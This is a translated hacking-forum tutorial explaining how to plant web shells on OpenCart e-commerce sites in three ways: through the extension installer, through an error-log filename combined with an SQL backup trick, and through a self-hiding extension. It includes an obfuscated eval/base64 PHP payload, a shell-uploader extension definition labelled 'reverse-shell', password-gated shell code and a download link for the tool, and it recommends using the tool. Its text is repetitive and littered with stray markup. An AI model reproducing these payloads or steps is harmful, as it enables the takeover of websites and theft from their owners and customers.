Hello, I will tell you how to shell the opencart site and its basics.
First of all, what is Opencart?
Opencart is a PHP-based, free resource-trading platform developed for the use of the program and for those who want to trade. It is among the most preferred preparations for the e-commerce world with its open source code, providing an developable website and user interface.
Now let's move on to our topic.
Method 1
First, we entered our Opencart site. Then we will enter Installer where it says 'Extensions'. (there is a puzzle sign)
and we will come to the file upload location where we will upload our file in zip form. We have uploaded our Shell to our site.
You can put the shell you want into the rar file that I have thrown.
Now let's go to shell directory on our site.
The direcotory where our shell is located;
ed;
With this method you can simply install a shell.
Method 2
In this method , it will be enough to follow the steps in the images to install the shell.
I logged into my opencart site again. Type setting/setting from the url part and go to the server part. The site is in Chinese, I translated it for you, but generally we always have to switch to the right tab.
After coming to the server part, we go down to the bottom and in the error management part, make the errors yes / yes and write the file name as you want and save it as .php.
After doing this, we will come to tool/backup in the url part or you can come from the menu in the same way. Save the code I will give you as opencart.sql or any name you want, with the extension .sql and click on the download button I marked 2.After doing
This process will happen on some sites and not on others.
ed;
Kod:
site name /catalog/view/theme/mintleaf/template/error/up.phpMethod 2
In this method , it will be enough to follow the steps in the images to install the shell.
I logged into my opencart site again. Type setting/setting from the url part and go to the server part. The site is in Chinese, I translated it for you, but generally we always have to switch to the right tab.
After coming to the server part, we go down to the bottom and in the error management part, make the errors yes / yes and write the file name as you want and save it as .php.
After doing this, we will come to tool/backup in the url part or you can come from the menu in the same way. Save the code I will give you as opencart.sql or any name you want, with the extension .sql and click on the download button I marked 2.After doing
This process will happen on some sites and not on others.
Kod:
[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(239, 239, 239)][CENTER][SIZE=5][COLOR=rgb(239, 239, 239)][CENTER][SIZE=5][COLOR=rgb(239, 239, 239)]
[CENTER]When it does, it becomes site.com/system/logs/ghost.php or site.com/system/storage/logs/ghost.php and will bring us an upload section.With this upload script, we can upload the shell we want.
After installing our shell, we can do whatever we want.
Exmple image from the shell we installed.
These are the codes we use;
After installing our shell, we can do whatever we want.
Exmple image from the shell we installed.
These are the codes we use;
PHP:
=php]SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table`Open these codes in a text editor and save as.PHP. You can then start using it
Method 3
In this method, you can load your own shell instantly by uploading the file I will give. Pretty simple but useful. It may not be for every site because this method is in the form of adding modules. If there are ftp settings etc. on the site, it may not be due to it, but otherwise you will not have any problems with installing a shell. Let us show you how to install it.
Let's go to the extensions section from the admin panel. From there, let's come to the installer part. Upload the file that I will give you in the upload section here and wait for a while.
When the download is complete, if we see "Succes", it means that our process is complete.
Normally, when we paste our url, only the error page will appear.
But with the arrangement I made, we come across another good point here. Our shell install point is hidden. If someone other than you tries to enter and does not know what to write, they cannot access the installation part.
It is necessary to write sitename.com/admin/language/en-gb/extension/extension/ghost?gho=st to get to the installation part. Otherwise you cannot install shell. You can do whatever you want by installing your own shell from here.
If we talk about our file, it is a little different from normal shells or upload scripts. The fact that it hides itself and shows itself with the command you type makes this shell unique and superior.
Sample index theme codes of our shell;
The main and main reason why I put their code is so that you can better understand the logic.
,A sampling of our other php login page codes;
Method 3
In this method, you can load your own shell instantly by uploading the file I will give. Pretty simple but useful. It may not be for every site because this method is in the form of adding modules. If there are ftp settings etc. on the site, it may not be due to it, but otherwise you will not have any problems with installing a shell. Let us show you how to install it.
Let's go to the extensions section from the admin panel. From there, let's come to the installer part. Upload the file that I will give you in the upload section here and wait for a while.
When the download is complete, if we see "Succes", it means that our process is complete.
Normally, when we paste our url, only the error page will appear.
But with the arrangement I made, we come across another good point here. Our shell install point is hidden. If someone other than you tries to enter and does not know what to write, they cannot access the installation part.
It is necessary to write sitename.com/admin/language/en-gb/extension/extension/ghost?gho=st to get to the installation part. Otherwise you cannot install shell. You can do whatever you want by installing your own shell from here.
If we talk about our file, it is a little different from normal shells or upload scripts. The fact that it hides itself and shows itself with the command you type makes this shell unique and superior.
Sample index theme codes of our shell;
The main and main reason why I put their code is so that you can better understand the logic.
HTML:
<?xml version="1.0" encoding="utf-8"?>
<modification>
<code>reverse-shell-00001</code>
<name>Ghost Killer - Anka Red Team | Opencart Shell Uploader</name>
<version>1.0</version>
<author>Ghost Killer - TurkHackTeam.ORG </author>
<link>http://www.zone-h.org/archive/notifier=ZoRRoKiN</link>
<file path="admin/controller/common/column_left.php">
<operation>
<search><![CDATA[if ($maintenance) {]]></search>
<add position="before"><![CDATA[
if ($this->user->hasPermission('access', 'extension/extension/shell')) {
$this->language->load('extension/extension/shell');
$maintenance[] = array(
'name' => $this->language->get('text_shell'),
'href' => $this->url->link('extension/extension/shell', 'user_token=' . $this->session->data['user_token'], true),
'children' => array()
);
}
]]></add>
</operation>
</file>
</modification>,A sampling of our other php login page codes;
PHP:
<?php
$username = "ghostprv8"; $password = "81b2c659bb4db00a3b500e854a9508cf"; $user = $_POST['user']; $pass = $_POST['pass']; $form = "<form method='POST'>[/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(209, 213, 216)]
[/COLOR][/SIZE]
[CENTER][SIZE=5][COLOR=rgb(209, 213, 216)] <center>
<h1>Ghost Killer - Login Page</h1> <br>
<br><input type='text' name='user'>
<br>
<input type='password' name='pass'>
<br>
<br><input type='submit' value='Do you Know the Pass'>
</form></br>";
session_start();
if( !isset($_SESSION['sec']) ){
$_SESSION['sec'] = false;
} if(isset($pass)) {
if($user == $username and md5($pass) == $password) {
$_SESSION['sec'] = true; }
else {
die( "{$form} <br> Hatali Sifre"); }
} if(!$_SESSION['sec']): echo $form; exit(); endif;
;
set_time_limit(0);
ini_set('memory_limit', '-1');
$ydLbyOjaJwMEe = array(
'uspharSWBjZbER' => 'admin',
'pakQixy' => '7bd34ddcbcc628617578bde1970f18d9',
'sansLlkDz' => '0',
'loiLrHCobiZTtPt' => '403',
'shqCCSCrKDsWXz' => '1',
'poRYrqfvfDg' => false,
'cgQnDTfdgULmtuf' => true,
);
There are hundreds of php codes that have already been written in the continuation. In our file, you have the opportunity to send any kind of shell to the server.
Therefore, I strongly recommend you to use it.
Click to Download Our Shell: tr.ocmod_.zip dosyasını indir - download
Click for Virus Total Results: VirusTotal
Note: I accept the virus showing as normal. Sheller already shows the virus as a general, those who want can use it.
Note 2: Do not use this extension on your own server.
Thank you for reading. Hope to see you on another issue...
original subject: https://www.turkhackteam.org/konular/opencart-siteye-shell-atma.2014125/
subject owner: Ghost Killer
Translator: Alexxb
Therefore, I strongly recommend you to use it.
Click to Download Our Shell: tr.ocmod_.zip dosyasını indir - download
Click for Virus Total Results: VirusTotal
Note: I accept the virus showing as normal. Sheller already shows the virus as a general, those who want can use it.
Note 2: Do not use this extension on your own server.
Thank you for reading. Hope to see you on another issue...
original subject: https://www.turkhackteam.org/konular/opencart-siteye-shell-atma.2014125/
subject owner: Ghost Killer
Translator: Alexxb
Son düzenleme:
